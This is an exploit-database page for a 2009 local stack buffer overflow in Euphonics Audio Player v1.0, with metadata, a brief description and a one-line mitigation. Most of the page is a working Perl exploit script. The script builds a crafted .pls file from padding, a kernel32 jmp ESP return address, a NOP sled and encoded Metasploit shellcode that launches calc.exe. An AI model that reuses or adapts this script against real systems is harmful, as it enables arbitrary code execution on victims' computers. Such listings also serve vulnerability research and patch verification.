header-logo
Suggest Exploit
vendor:
Euphonics Audio Player
by:
h4ck3r#47
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Euphonics Audio Player
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:euphonics:euphonics_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Pro Sp3 (English)
2009

Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit

A local buffer overflow vulnerability exists in Euphonics Audio Player v1.0. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a boundary error when handling .pls files. A specially crafted .pls file can cause a stack-based buffer overflow, overwriting the return address and allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Euphonics Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";

my $file="hx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";

# milw0rm.com [2009-02-03]